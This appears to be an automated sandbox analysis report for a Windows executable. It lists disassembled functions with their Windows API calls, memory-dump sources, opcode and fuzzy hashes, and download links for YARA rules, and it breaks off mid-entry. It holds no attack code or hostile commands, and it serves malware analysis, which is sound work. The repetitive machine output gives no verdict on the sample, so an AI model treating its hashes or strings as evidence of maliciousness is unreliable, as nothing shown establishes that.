                                                            Function 0060C664, Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
                                                            • GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            • Opcode ID: 88551de9a018a34a664c83f13b1c0ff5502ea333e94a54201414f9b12ce810cf
                                                            • Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
                                                            • Opcode Fuzzy Hash: 88551de9a018a34a664c83f13b1c0ff5502ea333e94a54201414f9b12ce810cf
                                                            • Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042B848, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042B852
                                                            • LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000), ref: 0042B881
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLibraryLoadMode
                                                            • String ID:
                                                            • API String ID: 2987862817-0
                                                            • Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                            • Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
                                                            • Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                            • Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005B8250, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • SetWindowTextW.USER32(?,00000000), ref: 005B8297
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: TextWindow
                                                            • String ID:
                                                            • API String ID: 530164218-0
                                                            • Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                            • Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
                                                            • Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                            • Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC477, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                            • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                            • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                            • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                            • Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
                                                            • Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                            • Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006AC4CA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                            • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                            • Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
                                                            • Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                            • Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004786AC, Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
                                                            • DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$DestroyLong
                                                            • String ID:
                                                            • API String ID: 2871862000-0
                                                            • Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                            • Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
                                                            • Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                            • Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406DF0, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
                                                            • VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                            • Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
                                                            • Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                            • Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409B58, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                            • Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
                                                            • Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                            • Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004236FC, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                            • Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
                                                            • Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                            • Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C857C, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FormatMessage
                                                            • String ID:
                                                            • API String ID: 1306739567-0
                                                            • Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                            • Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
                                                            • Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                            • Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C6808, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
                                                            • Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
                                                            • Opcode Fuzzy Hash: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
                                                            • Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040D754, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772
                                                              • Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                              • Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300373529.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300388682.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300396153.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300403206.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300409927.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileModuleName$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 4113206344-0
                                                            • Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                            • Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
                                                            • Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                            • Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C68A4, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.299482034.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.299473868.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300320952.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300327968.00000000006C6000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300333526.00000000006C7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300342993.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300351997.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300363739.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000003.00000002.300368665.00000000006CF000.00000004.00020000.sdmp Download File
